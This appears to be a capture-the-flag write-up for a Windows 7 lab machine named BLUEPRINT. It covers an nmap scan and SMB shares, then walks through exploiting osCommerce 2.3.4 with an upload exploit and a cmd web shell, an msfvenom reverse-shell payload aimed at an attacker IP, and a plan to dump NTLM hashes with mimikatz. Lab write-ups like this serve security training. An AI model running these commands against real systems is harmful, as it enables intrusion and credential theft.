

# Tasks
1. Lab user hash decrypted
2. root.txt

# NMAP SCAN
```nmap
PORT     STATE SERVICE      VERSION
 80/tcp    open  http         Microsoft IIS httpd 7.5
 | http-methods:
 |_  Potentially risky methods: TRACE
 |_http-server-header: Microsoft-IIS/7.5
 |_http-title: 404 - File or directory not found.
 135/tcp   open  msrpc        Microsoft Windows RPC
 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
 443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
 | http-methods:
 |_  Potentially risky methods: TRACE
 |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
 |_http-title: Index of /
 | ssl-cert: Subject: commonName=localhost
 | Not valid before: 2009-11-10T23:48:47
 |_Not valid after:  2019-11-08T23:48:47
 |_ssl-date: TLS randomness does not represent time
 | tls-alpn:
 |_  http/1.1
 445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
 3306/tcp  open  mysql        MariaDB (unauthorized)
 8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
 | http-methods:
 |_  Potentially risky methods: TRACE
 |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
 |_http-title: Index of /
 49152/tcp open  msrpc        Microsoft Windows RPC
 49153/tcp open  msrpc        Microsoft Windows RPC
 49154/tcp open  msrpc        Microsoft Windows RPC
 49158/tcp open  msrpc        Microsoft Windows RPC
 49159/tcp open  msrpc        Microsoft Windows RPC
 49160/tcp open  msrpc        Microsoft Windows RPC
 Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_clock-skew: mean: -8h19m59s, deviation: 34m37s, median: -8h00m00s
 |_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:e4:68:0d:1c:c9 (unknown)
 | smb-os-discovery:
 |   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
 |   OS CPE: cpe:/o:microsoft:windows_7::sp1
 |   Computer name: BLUEPRINT
 |   NetBIOS computer name: BLUEPRINT\x00
 |   Workgroup: WORKGROUP\x00
 |_  System time: 2021-08-22T09:19:46+01:00
 | smb-security-mode:
 |   account_used: guest
 |   authentication_level: user
 |   challenge_response: supported
 |_  message_signing: disabled (dangerous, but default)
 | smb2-security-mode:
 |   2.02:
 |_    Message signing enabled but not required
 | smb2-time:
 |   date: 2021-08-22T08:19:45
 |_  start_date: 2021-08-22T08:14:10




```

# NESSUS REPORT
[[blueprint_report.pdf]]

# SMB
## Findings
Shares
```
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Users           Disk      
        Windows         Disk      
```

# Web (Port 80)
## Findings
File not found

# Web (Port 443)
Bad request
# Web (Port 8080)
Directory listing of oscommerce-2.3.4
This version is vulnerable
Using this exploit https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Executionh
We're able to get RCE but unable to get a reverse shell or do anything else.

* Exploit is using the endpoint of install.php
* We can setup our own database using root username with no password and oscommerce as the database.

## File Upload Exploit
1. We can setup the database as oscommerce using root with no password
2. Next we can setup the authentication, we'll use the default credentials as `admin:admin`
3. Now we can proceed with the exploit found in searchsploit
```bash
python2 43191.py -u http://10.10.247.218:8080/oscommerce-2.3.4 --auth=admin:admin -f simple-web.php
[+] Authentication successful
[+] Successfully prepared the exploit and created a new newsletter with nID 5
[+] Successfully locked the newsletter. Now attempting to upload..
[*] Now trying to verify that the file simple-web.php uploaded..
[+] Got a HTTP 200 Reply for the uploaded file!
[+] The uploaded file should now be available at http://10.10.82.110:8080/oscommerce-2.3.4/catalog/admin/simple-web.php
```
Now we have RCE on a page.
```url
http://10.10.82.110:8080/oscommerce-2.3.4/catalog/admin/shell.php?cmd=whoami

nt\authority\system
```

Now we can upload a reverse shell using msfvenom
`msfvenom -p windows/shell/reverse_tcp LHOST=10.17.1.163 LPORT=9001 -f exe > shell.exe`

We get a response back but no shell.
So we're going to use metasploit multi/script/web_delivery

Now we have a shell as user SYSTEM. 
We can grab the root flag and then continue to find the NTLM hash.
To that first load mimikatz on the system on meterpreter
`load mimikatz`

Then proceed with the [commands](https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/4d7912bf-2a5e-4c45-abf4-0d11b38f5e45.xhtml)